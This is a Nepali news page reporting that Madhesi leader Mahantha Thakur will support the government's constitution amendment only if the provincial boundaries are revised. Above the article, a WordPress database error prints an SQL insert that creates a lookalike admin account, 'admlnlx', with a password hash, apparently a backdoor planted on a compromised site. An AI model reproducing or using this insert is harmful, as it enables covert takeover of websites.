WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B90GJVAxHOUn4xp/5itqwYWeeAF2gw/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-04 06:17:04', '', 'admlnlx', 'admlnlx')
काठमाडौं, मंसिर १७–
मधेशी मोर्चाका शीर्ष नेता एवम् तमलोपाका अध्यक्ष महन्थ ठाकुरले सरकारले ल्याएको संविधान संशोधन प्रस्ताव परिमार्जन भएपछि मात्रै त्यसलाई पारित गराउन मोर्चाले समर्थन गर्ने बताएका छन् ।
शुक्रबार रिपोर्टर्स क्लब नेपालले आयोजना गरेको साक्षात्कारमा बोल्दै अध्यक्ष ठाकुरले भने,‘सरकारले प्रस्ताव पारित हुने आधारहरु दिनुपर्छ, सिमांकनमा ५ जिल्लाबारे राज्य पूर्नसंरचना आयोगले अघि सारेको प्रतिवेदन अनुसार समस्या समाधान हुनुपर्छ, यदि त्यसो भयो भने हामी प्रस्ताव पारित गराउन समर्थन गर्छौं, होईन भने यथास्थितिमा यो प्रस्ताव स्विकार गर्न हामीलाई गाह«ो परेको छ ।’
उनले अहिले आएको प्रदेशको सिमांकनसम्बन्धी संशोधनले आफूहरुको माग सम्बोधन नगरेको भन्दै त्यसलाई आफूहरुले भनेबमोजिम परिमार्जन गर्नुपर्ने जिकिर गरे । अन्तरिम संविधानमा किटेरै मधेशीहरुको चाहना अनुरुप संघको विषयमा र स्वायत्त प्रदेशको विषयमा मधेशमा स्वायत्त प्रदेश बन्नेछ र त्यो प्रदेश अधिकार सम्पन्न हुनेछ भनेर लेखिएको उल्लेख गर्दै ठाकुरले थपे,‘तर अहिले आएको सिमांकन संरचनासम्बन्धी संशोधन प्रस्तावले यसको सम्बोधन गरेको छैन, बरु यहाँ त सत्ताधारी र सत्ताका दाबेदारहरुले आफ्नो वर्चस्व र प्रभुत्व कायम गर्दै सिमा रेखा कोरेको छ, यो बदल्न आवश्यक छ ।’